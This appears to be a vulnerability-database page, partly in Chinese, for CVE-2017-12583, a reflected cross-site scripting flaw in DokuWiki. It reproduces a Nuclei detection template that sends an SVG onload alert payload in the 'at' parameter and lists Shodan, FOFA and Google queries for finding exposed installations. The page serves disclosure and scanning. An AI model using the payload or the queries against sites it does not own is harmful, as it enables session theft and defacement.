CVE-2017-12583: DokuWiki - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: DokuWiki | POC: 已公开

漏洞描述

DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2017-12583

info:
  name: DokuWiki - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/splitbrain/dokuwiki/issues/2061
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12583
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-12583
    cwe-id: CWE-79
    epss-score: 0.03229
    epss-percentile: 0.86598
    cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dokuwiki
    product: dokuwiki
    shodan-query:
      - http.title:"DokuWiki"
      - http.title:"dokuwiki"
      - cpe:"cpe:2.3:a:dokuwiki:dokuwiki"
    fofa-query: title="dokuwiki"
    google-query: intitle:"dokuwiki"
  tags: cve,cve2017,xss,dokuwiki

http:
  - method: GET
    path:
      - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Unable to parse at parameter "<svg onload=alert(document.domain)>".</div>'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a00463044022062b7a3395ce0ffc620e2a5760d164ebd7755d7e35df244a4c2f03546227ffed30220446387657f02ebe7f299d61449c310013d060c1cb2770972aa2bc797afcad806:922c64590222798bb761d5b6d8e72950

相关漏洞推荐